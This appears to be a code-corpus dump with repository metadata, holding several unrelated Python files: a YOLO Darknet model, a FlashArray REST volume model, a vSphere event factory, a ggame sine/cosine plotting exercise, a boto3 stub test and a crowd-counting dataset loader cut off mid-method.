w, tw, h, th, iou_scores, obj_mask, noobj_mask) = [
slice_boundary(tensor, boundary)
for tensor in tensors
]
loss_x = self.mse_loss(x[obj_mask.bool()], tx[obj_mask.bool()])
loss_y = self.mse_loss(y[obj_mask.bool()], ty[obj_mask.bool()])
loss_w = self.mse_loss(w[obj_mask.bool()], tw[obj_mask.bool()])
loss_h = self.mse_loss(h[obj_mask.bool()], th[obj_mask.bool()])
loss_conf_obj = self.bce_loss(
pred_conf[obj_mask.bool()], tconf[obj_mask.bool()])
loss_conf_noobj = self.bce_loss(
pred_conf[noobj_mask.bool()], tconf[noobj_mask.bool()])
loss_conf = self.obj_scale * loss_conf_obj + self.noobj_scale * loss_conf_noobj
if obj_mask.bool().sum().item() == 0:
total_loss = self.noobj_scale * loss_conf_noobj
else:
total_loss = loss_x + loss_y + loss_w + loss_h + loss_conf
if torch.isnan(total_loss).item():
import pdb
pdb.set_trace()
if not return_metrics:
return output, total_loss
else:
conf_obj = pred_conf[obj_mask.bool()].mean()
conf_noobj = pred_conf[noobj_mask.bool()].mean()
conf50 = (pred_conf > 0.5).float()
iou50 = (iou_scores > 0.5).float()
iou75 = (iou_scores > 0.75).float()
detected_mask = conf50 * tconf
precision = torch.sum(iou50 * detected_mask) / \
(conf50.sum() + 1e-16)
recall50 = torch.sum(iou50 * detected_mask) / \
(obj_mask.sum() + 1e-16)
recall75 = torch.sum(iou75 * detected_mask) / \
(obj_mask.sum() + 1e-16)
self.metrics = {
"loss": to_cpu(total_loss).item(),
"x": to_cpu(loss_x).item(),
"y": to_cpu(loss_y).item(),
"w": to_cpu(loss_w).item(),
"h": to_cpu(loss_h).item(),
"conf": to_cpu(loss_conf).item(),
"recall50": to_cpu(recall50).item(),
"recall75": to_cpu(recall75).item(),
"precision": to_cpu(precision).item(),
"conf_obj": to_cpu(conf_obj).item(),
"conf_noobj": to_cpu(conf_noobj).item(),
"grid_size": grid_size,
}
return output, total_loss, self.metrics
class Darknet(nn.Module):
def __init__(self, config_path, ignore_width, num_classes=80, img_size=416):
super(Darknet, self).__init__()
self.module_defs = parse_model_config(config_path, num_classes)
self.hyperparams, self.module_list = create_modules(
self.module_defs, ignore_width)
self.yolo_layers = [
layer[0] for layer in self.module_list if hasattr(
layer[0], "metrics")]
self.img_size = img_size
self.seen = 0
self.header_info = np.array([0, 0, 0, self.seen, 0], dtype=np.int32)
def forward(self, x, targets):
img_dim = x.shape[2]
loss = 0
layer_outputs, yolo_outputs = [], []
for i, (module_def, module) in enumerate(
zip(self.module_defs, self.module_list)):
if module_def["type"] in ["convolutional", "upsample", "maxpool"]:
x = module(x)
elif module_def["type"] == "route":
x = torch.cat([layer_outputs[int(layer_i)]
for layer_i in module_def["layers"].split(",")], 1)
elif module_def["type"] == "shortcut":
layer_i = int(module_def["from"])
x = layer_outputs[-1] + layer_outputs[layer_i]
elif module_def["type"] == "yolo":
                x, layer_loss = module[0](x, targets, img_dim)
loss += layer_loss
yolo_outputs.append(x)
layer_outputs.append(x)
yolo_outputs = to_cpu(torch.cat(yolo_outputs, 1))
return loss, yolo_outputs
def infer(self, x):
loss, yolo_outputs = self.forward(x, None)
return yolo_outputs
def load_darknet_weights(self, weights_path):
with open(weights_path, "rb") as f:
header = np.fromfile(f, dtype=np.int32, count=5)
self.header_info = header
self.seen = header[3]
weights = np.fromfile(f, dtype=np.float32)
cutoff = None
if "darknet53.conv.74" in weights_path:
cutoff = 75
ptr = 0
for i, (module_def, module) in enumerate(
zip(self.module_defs, self.module_list)):
if i == cutoff:
break
if module_def["type"] == "convolutional":
conv_layer = module[0]
if module_def["batch_normalize"]:
bn_layer = module[1]
num_b = bn_layer.bias.numel()
bn_b = torch.from_numpy(
weights[ptr: ptr + num_b]).view_as(bn_layer.bias)
bn_layer.bias.data.copy_(bn_b)
ptr += num_b
bn_w = torch.from_numpy(
weights[ptr: ptr + num_b]).view_as(bn_layer.weight)
bn_layer.weight.data.copy_(bn_w)
ptr += num_b
bn_rm = torch.from_numpy(
weights[ptr: ptr + num_b]).view_as(bn_layer.running_mean)
bn_layer.running_mean.data.copy_(bn_rm)
ptr += num_b
bn_rv = torch.from_numpy(
weights[ptr: ptr + num_b]).view_as(bn_layer.running_var)
bn_layer.running_var.data.copy_(bn_rv)
ptr += num_b
else:
num_b = conv_layer.bias.numel()
conv_b = torch.from_numpy(
weights[ptr: ptr + num_b]).view_as(conv_layer.bias)
conv_layer.bias.data.copy_(conv_b)
ptr += num_b
num_w = conv_layer.weight.numel()
conv_w = torch.from_numpy(
weights[ptr: ptr + num_w]).view_as(conv_layer.weight)
conv_layer.weight.data.copy_(conv_w)
ptr += num_w
def save_darknet_weights(self, path, cutoff=-1):
fp = open(path, "wb")
self.header_info[3] = self.seen
self.header_info.tofile(fp)
for i, (module_def, module) in enumerate(
zip(self.module_defs[:cutoff], self.module_list[:cutoff])):
if module_def["type"] == "convolutional":
conv_layer = module[0]
if module_def["batch_normalize"]:
bn_layer = module[1]
bn_layer.bias.data.cpu().numpy().tofile(fp)
bn_layer.weight.data.cpu().numpy().tofile(fp)
bn_layer.running_mean.data.cpu().numpy().tofile(fp)
bn_layer.running_var.data.cpu().numpy().tofile(fp)
else:
conv_layer.bias.data.cpu().numpy().tofile(fp)
conv_layer.weight.data.cpu().numpy().tofile(fp)
fp.close()
| true
| true
|
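The heart of YOLOLayer.forward above is the box decoding: centers are sigmoid(raw) plus the cell's grid offset, sizes are the (stride-scaled) anchor times exp(raw), and everything is multiplied by the stride to return to pixel units. A small numeric sketch of that arithmetic for a single cell (all values are illustrative):

import torch

stride = 32.0                    # img_dim / grid_size
grid_x, grid_y = 3.0, 5.0        # offsets of the responsible grid cell
anchor_w, anchor_h = 3.6, 2.8    # anchor already divided by the stride

t = torch.tensor([0.2, -0.4, 0.1, 0.3])  # raw (t_x, t_y, t_w, t_h)
bx = (torch.sigmoid(t[0]) + grid_x) * stride
by = (torch.sigmoid(t[1]) + grid_y) * stride
bw = anchor_w * torch.exp(t[2]) * stride
bh = anchor_h * torch.exp(t[3]) * stride
print(bx.item(), by.item(), bw.item(), bh.item())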
1c40cef8afd98421821fb3f4e64ddeed3a028230
| 8,928
|
py
|
Python
|
pypureclient/flasharray/FA_2_2/models/volume.py
|
Flav-STOR-WL/py-pure-client
|
03b889c997d90380ac5d6380ca5d5432792d3e89
|
[
"BSD-2-Clause"
] | 14
|
2018-12-07T18:30:27.000Z
|
2022-02-22T09:12:33.000Z
|
pypureclient/flasharray/FA_2_2/models/volume.py
|
Flav-STOR-WL/py-pure-client
|
03b889c997d90380ac5d6380ca5d5432792d3e89
|
[
"BSD-2-Clause"
] | 28
|
2019-09-17T21:03:52.000Z
|
2022-03-29T22:07:35.000Z
|
pypureclient/flasharray/FA_2_2/models/volume.py
|
Flav-STOR-WL/py-pure-client
|
03b889c997d90380ac5d6380ca5d5432792d3e89
|
[
"BSD-2-Clause"
] | 15
|
2020-06-11T15:50:08.000Z
|
2022-03-21T09:27:25.000Z
|
# coding: utf-8
"""
FlashArray REST API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: 2.2
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re
import six
import typing
from ....properties import Property
if typing.TYPE_CHECKING:
from pypureclient.flasharray.FA_2_2 import models
class Volume(object):
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'id': 'str',
'name': 'str',
'connection_count': 'int',
'created': 'int',
'destroyed': 'bool',
'host_encryption_key_status': 'str',
'provisioned': 'int',
'qos': 'Qos',
'serial': 'str',
'space': 'Space',
'time_remaining': 'int',
'pod': 'Reference',
'source': 'FixedReference',
'subtype': 'str',
'volume_group': 'Reference',
'requested_promotion_state': 'str',
'promotion_status': 'str'
}
attribute_map = {
'id': 'id',
'name': 'name',
'connection_count': 'connection_count',
'created': 'created',
'destroyed': 'destroyed',
'host_encryption_key_status': 'host_encryption_key_status',
'provisioned': 'provisioned',
'qos': 'qos',
'serial': 'serial',
'space': 'space',
'time_remaining': 'time_remaining',
'pod': 'pod',
'source': 'source',
'subtype': 'subtype',
'volume_group': 'volume_group',
'requested_promotion_state': 'requested_promotion_state',
'promotion_status': 'promotion_status'
}
required_args = {
}
def __init__(
self,
id=None, # type: str
name=None, # type: str
connection_count=None, # type: int
created=None, # type: int
destroyed=None, # type: bool
host_encryption_key_status=None, # type: str
provisioned=None, # type: int
qos=None, # type: models.Qos
serial=None, # type: str
space=None, # type: models.Space
time_remaining=None, # type: int
pod=None, # type: models.Reference
source=None, # type: models.FixedReference
subtype=None, # type: str
volume_group=None, # type: models.Reference
requested_promotion_state=None, # type: str
promotion_status=None, # type: str
):
"""
Keyword args:
id (str): A globally unique, system-generated ID. The ID cannot be modified and cannot refer to another resource.
name (str): A user-specified name. The name must be locally unique and can be changed.
connection_count (int): The total number of hosts and host groups connected to the volume.
created (int): The volume creation time. Measured in milliseconds since the UNIX epoch.
destroyed (bool): Returns a value of `true` if the volume has been destroyed and is pending eradication. The `time_remaining` value displays the amount of time left until the destroyed volume is permanently eradicated. Before the `time_remaining` period has elapsed, the destroyed volume can be recovered by setting `destroyed=false`. Once the `time_remaining` period has elapsed, the volume is permanently eradicated and can no longer be recovered.
host_encryption_key_status (str): The host encryption key status for this volume. Possible values include `none`, `detected`, and `fetched`.
provisioned (int): The virtual size of the volume. Measured in bytes and must be a multiple of 512.
qos (Qos): Displays QoS limit information.
serial (str): A globally unique serial number generated by the system when the volume is created.
space (Space): Displays size and space consumption information.
time_remaining (int): The amount of time left until the destroyed volume is permanently eradicated. Measured in milliseconds. Before the `time_remaining` period has elapsed, the destroyed volume can be recovered by setting `destroyed=false`.
pod (Reference): A reference to the pod.
source (FixedReference): A reference to the originating volume as a result of a volume copy.
subtype (str): The type of volume. Valid values are `protocol_endpoint` and `regular`.
volume_group (Reference): A reference to the volume group.
requested_promotion_state (str): Valid values are `promoted` and `demoted`. Patch `requested_promotion_state` to `demoted` to demote the volume so that the volume stops accepting write requests. Patch `requested_promotion_state` to `promoted` to promote the volume so that the volume starts accepting write requests.
promotion_status (str): Current promotion status of a volume. Valid values are `promoted` and `demoted`. A status of `promoted` indicates that the volume has been promoted and can accept write requests from hosts. This is the default status for a volume when it is created. A status of `demoted` indicates that the volume has been demoted and no longer accepts write requests.
"""
if id is not None:
self.id = id
if name is not None:
self.name = name
if connection_count is not None:
self.connection_count = connection_count
if created is not None:
self.created = created
if destroyed is not None:
self.destroyed = destroyed
if host_encryption_key_status is not None:
self.host_encryption_key_status = host_encryption_key_status
if provisioned is not None:
self.provisioned = provisioned
if qos is not None:
self.qos = qos
if serial is not None:
self.serial = serial
if space is not None:
self.space = space
if time_remaining is not None:
self.time_remaining = time_remaining
if pod is not None:
self.pod = pod
if source is not None:
self.source = source
if subtype is not None:
self.subtype = subtype
if volume_group is not None:
self.volume_group = volume_group
if requested_promotion_state is not None:
self.requested_promotion_state = requested_promotion_state
if promotion_status is not None:
self.promotion_status = promotion_status
def __setattr__(self, key, value):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `Volume`".format(key))
if key == "provisioned" and value is not None:
if value > 4503599627370496:
raise ValueError("Invalid value for `provisioned`, value must be less than or equal to `4503599627370496`")
self.__dict__[key] = value
def __getattribute__(self, item):
value = object.__getattribute__(self, item)
if isinstance(value, Property):
raise AttributeError
else:
return value
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
if hasattr(self, attr):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(Volume, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, Volume):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
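A minimal usage sketch (added for illustration, not part of the generated module): the guarded `__setattr__` above rejects unmapped keys and caps `provisioned` at 4503599627370496 bytes (4 PiB).
vol = Volume(name='vol01', provisioned=1048576, subtype='regular')   # sketch only
print(vol.to_dict())        # {'name': 'vol01', 'provisioned': 1048576, 'subtype': 'regular'}
try:
    vol.bad_key = 1         # not in attribute_map -> KeyError
except KeyError as exc:
    print(exc)
try:
    vol.provisioned = 2**53  # exceeds the 4503599627370496 cap -> ValueError
except ValueError as exc:
    print(exc)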
| 42.312796
| 461
| 0.610887
|
import pprint
import re
import six
import typing
from ....properties import Property
if typing.TYPE_CHECKING:
from pypureclient.flasharray.FA_2_2 import models
class Volume(object):
swagger_types = {
'id': 'str',
'name': 'str',
'connection_count': 'int',
'created': 'int',
'destroyed': 'bool',
'host_encryption_key_status': 'str',
'provisioned': 'int',
'qos': 'Qos',
'serial': 'str',
'space': 'Space',
'time_remaining': 'int',
'pod': 'Reference',
'source': 'FixedReference',
'subtype': 'str',
'volume_group': 'Reference',
'requested_promotion_state': 'str',
'promotion_status': 'str'
}
attribute_map = {
'id': 'id',
'name': 'name',
'connection_count': 'connection_count',
'created': 'created',
'destroyed': 'destroyed',
'host_encryption_key_status': 'host_encryption_key_status',
'provisioned': 'provisioned',
'qos': 'qos',
'serial': 'serial',
'space': 'space',
'time_remaining': 'time_remaining',
'pod': 'pod',
'source': 'source',
'subtype': 'subtype',
'volume_group': 'volume_group',
'requested_promotion_state': 'requested_promotion_state',
'promotion_status': 'promotion_status'
}
required_args = {
}
def __init__(
self,
id=None,
name=None,
connection_count=None,
created=None,
destroyed=None,
host_encryption_key_status=None,
provisioned=None,
qos=None,
serial=None,
space=None,
time_remaining=None,
pod=None,
source=None,
subtype=None,
volume_group=None,
requested_promotion_state=None,
promotion_status=None,
):
if id is not None:
self.id = id
if name is not None:
self.name = name
if connection_count is not None:
self.connection_count = connection_count
if created is not None:
self.created = created
if destroyed is not None:
self.destroyed = destroyed
if host_encryption_key_status is not None:
self.host_encryption_key_status = host_encryption_key_status
if provisioned is not None:
self.provisioned = provisioned
if qos is not None:
self.qos = qos
if serial is not None:
self.serial = serial
if space is not None:
self.space = space
if time_remaining is not None:
self.time_remaining = time_remaining
if pod is not None:
self.pod = pod
if source is not None:
self.source = source
if subtype is not None:
self.subtype = subtype
if volume_group is not None:
self.volume_group = volume_group
if requested_promotion_state is not None:
self.requested_promotion_state = requested_promotion_state
if promotion_status is not None:
self.promotion_status = promotion_status
def __setattr__(self, key, value):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `Volume`".format(key))
if key == "provisioned" and value is not None:
if value > 4503599627370496:
raise ValueError("Invalid value for `provisioned`, value must be less than or equal to `4503599627370496`")
self.__dict__[key] = value
def __getattribute__(self, item):
value = object.__getattribute__(self, item)
if isinstance(value, Property):
raise AttributeError
else:
return value
def to_dict(self):
result = {}
for attr, _ in six.iteritems(self.swagger_types):
if hasattr(self, attr):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(Volume, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
return pprint.pformat(self.to_dict())
def __repr__(self):
return self.to_str()
def __eq__(self, other):
if not isinstance(other, Volume):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
| true
| true
|
1c40cf17ebef6c5aaba6a98ca4e67106f981e182
| 1,170
|
py
|
Python
|
pyvisdk/do/exit_standby_mode_failed_event.py
|
Infinidat/pyvisdk
|
f2f4e5f50da16f659ccc1d84b6a00f397fa997f8
|
[
"MIT"
] | null | null | null |
pyvisdk/do/exit_standby_mode_failed_event.py
|
Infinidat/pyvisdk
|
f2f4e5f50da16f659ccc1d84b6a00f397fa997f8
|
[
"MIT"
] | null | null | null |
pyvisdk/do/exit_standby_mode_failed_event.py
|
Infinidat/pyvisdk
|
f2f4e5f50da16f659ccc1d84b6a00f397fa997f8
|
[
"MIT"
] | null | null | null |
import logging
from pyvisdk.exceptions import InvalidArgumentError
########################################
# Automatically generated, do not edit.
########################################
log = logging.getLogger(__name__)
def ExitStandbyModeFailedEvent(vim, *args, **kwargs):
'''This event records that the host failed to exit standby mode.'''
obj = vim.client.factory.create('{urn:vim25}ExitStandbyModeFailedEvent')
# do some validation checking...
    if (len(args) + len(kwargs)) < 4:
        raise IndexError('Expected at least 4 arguments got: %d' % (len(args) + len(kwargs)))
required = [ 'chainId', 'createdTime', 'key', 'userName' ]
optional = [ 'changeTag', 'computeResource', 'datacenter', 'ds', 'dvs',
'fullFormattedMessage', 'host', 'net', 'vm', 'dynamicProperty', 'dynamicType' ]
for name, arg in zip(required+optional, args):
setattr(obj, name, arg)
for name, value in kwargs.items():
if name in required + optional:
setattr(obj, name, value)
else:
raise InvalidArgumentError("Invalid argument: %s. Expected one of %s" % (name, ", ".join(required + optional)))
return obj
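A hedged sketch of how the positional and keyword arguments map onto the event object; the `stub_vim` handle below is a stand-in stub for the demo, not a real pyvisdk service instance.
from types import SimpleNamespace

class _StubFactory:
    # mimics vim.client.factory.create closely enough for this demo
    def create(self, name):
        return SimpleNamespace()

stub_vim = SimpleNamespace(client=SimpleNamespace(factory=_StubFactory()))
event = ExitStandbyModeFailedEvent(stub_vim, 1, '2021-01-01T00:00:00Z', 42, 'root',
                                   fullFormattedMessage='exit standby failed')
print(event.chainId, event.userName)   # -> 1 root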
| 34.411765
| 124
| 0.610256
|
import logging
from pyvisdk.exceptions import InvalidArgumentError
log = logging.getLogger(__name__)
def ExitStandbyModeFailedEvent(vim, *args, **kwargs):
    obj = vim.client.factory.create('{urn:vim25}ExitStandbyModeFailedEvent')
    if (len(args) + len(kwargs)) < 4:
        raise IndexError('Expected at least 4 arguments got: %d' % (len(args) + len(kwargs)))
    required = [ 'chainId', 'createdTime', 'key', 'userName' ]
    optional = [ 'changeTag', 'computeResource', 'datacenter', 'ds', 'dvs',
        'fullFormattedMessage', 'host', 'net', 'vm', 'dynamicProperty', 'dynamicType' ]
    for name, arg in zip(required+optional, args):
        setattr(obj, name, arg)
    for name, value in kwargs.items():
        if name in required + optional:
            setattr(obj, name, value)
        else:
            raise InvalidArgumentError("Invalid argument: %s. Expected one of %s" % (name, ", ".join(required + optional)))
    return obj
| true
| true
|
1c40d1db1ec34f7d9f6f1e18ea250056b1f2eb83
| 1,822
|
py
|
Python
|
sinecosine.py
|
hackmeehan/Sine-Cosine
|
d789b48d3b8f0c6f6a5f17ae57a451100e2ef877
|
[
"MIT"
] | null | null | null |
sinecosine.py
|
hackmeehan/Sine-Cosine
|
d789b48d3b8f0c6f6a5f17ae57a451100e2ef877
|
[
"MIT"
] | null | null | null |
sinecosine.py
|
hackmeehan/Sine-Cosine
|
d789b48d3b8f0c6f6a5f17ae57a451100e2ef877
|
[
"MIT"
] | null | null | null |
"""
sinecosine.py
Author: Jack Meehan
Credit: https://www.webucator.com/blog/2015/03/python-color-constants-module/ (used for colors)
Assignment:
The sine and cosine functions are provided in the Python math library. These functions are used
to relate *angles* to *rectangular* (x,y) coordinate systems and can be very useful in computer
game design.
Unlike the last assignment using ggame, this one will not provide any "skeleton" code to fill
in. You should use your submission for the Picture assignment
(https://github.com/HHS-IntroProgramming/Picture) as a reference for starting this assignment.
See:
https://github.com/HHS-IntroProgramming/Sine-Cosine/blob/master/README.md
for a detailed list of requirements for this assignment.
https://github.com/HHS-IntroProgramming/Standards-and-Syllabus/wiki/Displaying-Graphics
for general information on how to use ggame.
https://github.com/HHS-IntroProgramming/Standards-and-Syllabus/wiki/Programmed-Graphics
for general information on using list comprehensions to generate graphics.
http://brythonserver.github.io/ggame/
for detailed information on ggame.
"""
from ggame import App, Sprite, Color, CircleAsset, RectangleAsset, LineStyle
from math import sin, cos, radians
red = Color(0xff0000, 1.0)
purple = Color(0x9A32CD, 1.0)
blue = Color(0x0000EE, 1.0)
black = Color(0x000000, 1.0)
line = LineStyle(2, black)
xcoordinates = range(0, 360, 10)
bluecircle = CircleAsset(6, line, blue)
# Sine curve: one dot per 10-degree step; screen y grows downward.
yay = [Sprite(bluecircle, (x, 100+100*sin(radians(x)))) for x in xcoordinates]
redcircle = CircleAsset(6, line, red)
# Cosine curve over the same angles.
yay = [Sprite(redcircle, (x, 100+100*cos(radians(x)))) for x in xcoordinates]
purplecircle = CircleAsset(6, line, purple)
# Circle: cos drives x and sin drives y, radius 100, centred at (100, 400).
yay = [Sprite(purplecircle, (100+100*cos(radians(x)), 400+100*sin(radians(x)))) for x in xcoordinates]
myapp = App()
myapp.run()
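A standalone check (plain Python, no ggame needed) of the angle-to-coordinate mapping the sprites above rely on: a point at angle theta on a circle of radius r centred at (cx, cy) sits at (cx + r*cos(theta), cy + r*sin(theta)).
from math import sin, cos, radians
cx, cy, r = 100, 400, 100                     # centre and radius of the purple circle
for angle in (0, 90, 180, 270):
    x = cx + r * cos(radians(angle))
    y = cy + r * sin(radians(angle))
    print(angle, round(x, 6), round(y, 6))    # 0 -> 200, 400; 90 -> 100, 500; ...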
| 35.72549
| 102
| 0.767838
|
from ggame import App, Sprite, Color, CircleAsset, RectangleAsset, LineStyle
from math import sin, cos, radians
red = Color(0xff0000, 1.0)
purple = Color(0x9A32CD, 1.0)
blue = Color(0x0000EE, 1.0)
black = Color(0x000000, 1.0)
line = LineStyle(2, black)
xcoordinates = range(0, 360, 10)
bluecircle = CircleAsset(6, line, blue)
yay = [Sprite(bluecircle, (x, 100+100*sin(radians(x)))) for x in xcoordinates]
redcircle = CircleAsset(6, line, red)
yay = [Sprite(redcircle, (x, 100+100*cos(radians(x)))) for x in xcoordinates]
purplecircle = CircleAsset(6, line, purple)
yay = [Sprite(purplecircle, (100+100*cos(radians(x)), 400+100*sin(radians(x)))) for x in xcoordinates]
myapp = App()
myapp.run()
| true
| true
|
1c40d214a58bdf8e757e7e56b77ea9ba880b9678
| 679
|
py
|
Python
|
tests/type_maps/test_method_argument_map.py
|
vemel/boto3_type_annotations
|
88aa07a36f5626428c8d3878a4846d8cb667ea28
|
[
"MIT"
] | 44
|
2019-11-09T04:29:31.000Z
|
2022-02-11T10:51:41.000Z
|
tests/type_maps/test_method_argument_map.py
|
vemel/boto3_type_annotations
|
88aa07a36f5626428c8d3878a4846d8cb667ea28
|
[
"MIT"
] | 28
|
2019-11-26T23:50:19.000Z
|
2021-05-31T18:52:46.000Z
|
tests/type_maps/test_method_argument_map.py
|
vemel/boto3_type_annotations
|
88aa07a36f5626428c8d3878a4846d8cb667ea28
|
[
"MIT"
] | 3
|
2019-11-09T16:43:04.000Z
|
2019-12-20T15:05:33.000Z
|
import unittest
from mypy_boto3_builder.service_name import ServiceNameCatalog
from mypy_boto3_builder.type_maps.method_argument_map import get_method_arguments_stub
class MethodArgumentMapTestCase(unittest.TestCase):
def test_get_method_arguments_stub(self) -> None:
self.assertTrue(
get_method_arguments_stub(
ServiceNameCatalog.ec2, "Instance", "delete_tags"
)[0]
)
self.assertIsNone(
get_method_arguments_stub(ServiceNameCatalog.ec2, "Instance", "unknown")
)
self.assertIsNone(
get_method_arguments_stub(ServiceNameCatalog.ec2, "unknown", "delete_tags")
)
| 33.95
| 87
| 0.702504
|
import unittest
from mypy_boto3_builder.service_name import ServiceNameCatalog
from mypy_boto3_builder.type_maps.method_argument_map import get_method_arguments_stub
class MethodArgumentMapTestCase(unittest.TestCase):
def test_get_method_arguments_stub(self) -> None:
self.assertTrue(
get_method_arguments_stub(
ServiceNameCatalog.ec2, "Instance", "delete_tags"
)[0]
)
self.assertIsNone(
get_method_arguments_stub(ServiceNameCatalog.ec2, "Instance", "unknown")
)
self.assertIsNone(
get_method_arguments_stub(ServiceNameCatalog.ec2, "unknown", "delete_tags")
)
| true
| true
|
1c40d37e1ca0a0a32af9ab4412f2d1ddda580cdf
| 5,818
|
py
|
Python
|
my_dataset_test.py
|
TopoXLab/TopoCount
|
eb93de2bc40d4421ea39c1b80d5c4c4829f3e369
|
[
"MIT"
] | 18
|
2020-12-18T02:54:55.000Z
|
2022-02-26T01:52:22.000Z
|
my_dataset_test.py
|
TopoXLab/TopoCount
|
eb93de2bc40d4421ea39c1b80d5c4c4829f3e369
|
[
"MIT"
] | 2
|
2021-01-13T09:15:38.000Z
|
2021-03-26T08:43:43.000Z
|
my_dataset_test.py
|
TopoXLab/TopoCount
|
eb93de2bc40d4421ea39c1b80d5c4c4829f3e369
|
[
"MIT"
] | 8
|
2020-12-25T01:50:55.000Z
|
2021-06-08T05:21:48.000Z
|
from torch.utils.data import Dataset
import os
import matplotlib.pyplot as plt
import numpy as np
import torch
import cv2
from torchvision import transforms
import random
from PIL import Image
import glob
class CrowdDataset(Dataset):
'''
crowdDataset
'''
def __init__(self, img_root, gt_dot_root, split_txt_filepath=None, phase='train', aug=0, normalize=True, fixed_size=-1, max_side=-1):
'''
img_root: the root path of images.
gt_dot_root: the root path of ground-truth dot map.
phase: train or test
split_txt_filepath: text file containing list of images to include in the dataset. If none, then use all jpg images in img_root
'''
self.img_root=img_root
self.gt_dot_root=gt_dot_root
self.phase=phase
self.split_txt_filepath = split_txt_filepath
if(split_txt_filepath is None):
self.img_names=[filename for filename in os.listdir(img_root) \
if os.path.isfile(os.path.join(img_root,filename))]
else:
img_list = np.loadtxt(split_txt_filepath, dtype=str)
self.img_names=[filename + '.jpg' for filename in img_list[:,0] \
if os.path.isfile(os.path.join(img_root,filename+ '.jpg'))]
self.n_samples=len(self.img_names)
self.aug=aug
        self.normalize = normalize
self.fixed_size = fixed_size
self.max_side = max_side
print('self.aug', self.aug)
print('self.fixed_size', self.fixed_size)
def __len__(self):
return self.n_samples
def __getitem__(self,index):
        assert index < len(self), 'index range error'
img_name=self.img_names[index]
img=plt.imread(os.path.join(self.img_root,img_name))/255# convert from [0,255] to [0,1]
if len(img.shape)==2: # expand grayscale image to three channel.
img=img[:,:,np.newaxis]
img=np.concatenate((img,img,img),2)
img=img[:,:,0:3]
        gtdot_path = os.path.join(self.gt_dot_root,img_name.replace('.jpg','_gt_dots.npy'))
        if(os.path.isfile(gtdot_path)):
            gt_dot=np.load(gtdot_path)
        else:
            gtdot_path = os.path.join(self.gt_dot_root,img_name.replace('.jpg','.npy'))
if(os.path.isfile(gtdot_path)):
gt_dot=np.load(gtdot_path)
else:
gt_dot=np.zeros((img.shape[0], img.shape[1]))
if random.randint(0,1)==1 and self.phase=='train':
img=img[:,::-1].copy() # horizontal flip
gt_dot=gt_dot[:,::-1].copy() # horizontal flip
if(self.phase=='train' and self.max_side > 0):
h = img.shape[0]
w = img.shape[1]
h2 = h
w2 = w
crop = False
if(h > self.max_side):
h2 = self.max_side
crop = True
if(w > self.max_side):
w2 = self.max_side
crop = True
if(crop):
y=0
x=0
if(not (h2 ==h)):
y = np.random.randint(0, high = h-h2)
if(not (w2 ==w)):
x = np.random.randint(0, high = w-w2)
img = img[y:y+h2, x:x+w2, :]
gt_dot = gt_dot[y:y+h2, x:x+w2]
        if ((self.aug > 0 and self.phase=='train') or (self.fixed_size > 0)):
            i = -1
            # Back to the 8-bit range for PIL; RandomCrop.get_params only reads the size.
            img_pil = Image.fromarray((img * 255).astype(np.uint8))
if(self.fixed_size < 0):
i, j, h, w = transforms.RandomCrop.get_params(img_pil, output_size=(img.shape[0]//4, img.shape[1]//4))
elif(self.fixed_size < img.shape[0] or self.fixed_size < img.shape[1]):
i, j, h, w = transforms.RandomCrop.get_params(img_pil, output_size=(min(self.fixed_size,img.shape[0]), min(self.fixed_size,img.shape[1])))
#print('i, j, h, w',i, j, h, w)
if(i >= 0):
img = img[i:i+h, j:j+w, :]
gt_dot = gt_dot[i:i+h, j:j+w]
max_scale = 16
if max_scale>1: # fix image and gt to match model.
#ds_rows=int(img.shape[0]//max_scale)*max_scale
#ds_cols=int(img.shape[1]//max_scale)*max_scale
#img = img[:ds_rows, :ds_cols, :]
#gt_dmap = gt_dmap[:ds_rows, :ds_cols]
#gt_dot = gt_dot[:ds_rows, :ds_cols]
ds_rows=int(img.shape[0]//max_scale)*max_scale
ds_cols=int(img.shape[1]//max_scale)*max_scale
pad_y1 = 0
pad_y2 = 0
pad_x1 = 0
pad_x2 = 0
if(ds_rows < img.shape[0]):
pad_y1 = (max_scale - (img.shape[0] - ds_rows))//2
pad_y2 = (max_scale - (img.shape[0] - ds_rows)) - pad_y1
if(ds_cols < img.shape[1]):
pad_x1 = (max_scale - (img.shape[1] - ds_cols))//2
pad_x2 = (max_scale - (img.shape[1] - ds_cols)) - pad_x1
img = np.pad(img, ((pad_y1,pad_y2),(pad_x1,pad_x2),(0,0)), 'constant', constant_values=(1,) )# padding constant differs by dataset based on bg color
gt_dot = np.pad(gt_dot, ((pad_y1,pad_y2),(pad_x1,pad_x2)), 'constant', constant_values=(0,) )# padding constant differs by dataset based on bg color
gt_dot=gt_dot[np.newaxis,:,:]
gt_dot_tensor=torch.tensor(gt_dot,dtype=torch.float)
img=img.transpose((2,0,1)) # convert to order (channel,rows,cols)
img_tensor=torch.tensor(img,dtype=torch.float)
if(self.normalize):
img_tensor=transforms.functional.normalize(img_tensor,mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
